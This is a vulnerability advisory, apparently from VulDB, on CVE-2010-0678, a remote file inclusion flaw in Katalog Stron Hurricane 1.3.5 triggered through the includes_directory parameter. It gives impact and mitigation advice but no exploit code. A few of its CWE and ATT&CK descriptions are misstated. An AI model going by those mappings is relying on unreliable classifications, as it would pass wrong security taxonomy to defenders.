CVE-2010-0678 in Katalog Stron Hurricane
Summary
by MITRE
PHP remote file inclusion vulnerability in includes/moderation.php in Katalog Stron Hurricane 1.3.5, and possibly earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the includes_directory parameter.
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
Analysis
by VulDB Data Team • 05/01/2026
The vulnerability described in CVE-2010-0678 represents a critical remote file inclusion flaw within the Katalog Stron Hurricane content management system version 1.3.5 and potentially earlier releases. This issue specifically targets the moderation.php script which processes user input through the includes_directory parameter without proper validation or sanitization. The vulnerability becomes exploitable when the PHP configuration has register_globals enabled, a deprecated feature that automatically converts HTTP request variables into global variables, creating dangerous attack vectors that were common in older PHP applications.
The technical exploitation of this vulnerability occurs through a classic remote file inclusion attack pattern where malicious actors can inject URLs into the includes_directory parameter to reference external malicious files. When register_globals is enabled, the application fails to properly validate or sanitize the user-supplied URL, allowing the PHP interpreter to treat the injected URL as a legitimate file path. This creates a scenario where remote attackers can execute arbitrary PHP code on the target server, effectively bypassing normal access controls and potentially gaining full system compromise capabilities. The vulnerability directly maps to CWE-88, which describes improper neutralization of special elements used in an OS command, and more specifically aligns with CWE-94, which covers the execution of arbitrary code or commands.
The operational impact of this vulnerability extends beyond simple code execution, as it provides attackers with potential access to sensitive system resources and data. In a production environment, successful exploitation could lead to complete server compromise, data theft, or the installation of backdoors for persistent access. The vulnerability affects systems where the legacy register_globals setting remains enabled, which was common in older PHP applications before the feature was deprecated in PHP 5.3.0 and removed entirely in PHP 5.4.0. Organizations running affected versions of Katalog Stron Hurricane face significant risk of unauthorized access and potential data breaches.
Security mitigations for this vulnerability require immediate remediation steps including disabling the register_globals directive in PHP configuration, implementing proper input validation and sanitization for all user-supplied parameters, and applying the latest security patches provided by the software vendor. The most effective immediate fix involves ensuring that register_globals is set to off in php.ini configuration files, as this eliminates the automatic global variable creation that enables the attack. Additionally, developers should implement proper parameter validation using functions like filter_var() or input sanitization techniques to prevent malicious URLs from being processed. Organizations should also consider implementing web application firewalls and monitoring systems to detect and prevent exploitation attempts. This vulnerability demonstrates the critical importance of proper input validation and the dangers of legacy PHP configurations, aligning with ATT&CK technique T1190 for exploitation of remote services and T1059 for execution of malicious code through web interfaces.